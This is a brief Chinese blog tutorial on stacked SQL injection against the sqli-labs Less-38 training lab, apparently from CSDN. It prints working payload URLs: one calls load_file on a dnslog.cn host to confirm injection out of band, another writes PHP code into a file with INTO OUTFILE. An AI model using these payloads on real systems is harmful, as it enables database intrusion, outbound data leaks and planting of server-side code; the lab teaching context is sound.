sql注入——堆叠注入

堆叠注入即多语句注入,多条语句用;隔开

以sql labs38为例

1.在dnslog上获取

2.在sql labs38上输入多条语句:

http://localhost/sqli-labs-master/Less-38/?id=1'; select load_file("\\\\9shl7n.dnslog.cn\\dsfs"); -- -

3.可看到在dnslog上执行成功

4.在sql labs38中写入下列句子并执行

http://localhost/sqli-labs-master/Less-38/?id=1'; select "<?php phpinfo();?>" into outfile "d:\\5.txt"; -- -

扫描二维码关注公众号,回复: 9078339 查看本文章

5.到d盘查看,发现写入成功

发布了17 篇原创文章 · 获赞 4 · 访问量 315

猜你喜欢

转载自blog.csdn.net/cxrpty/article/details/104255907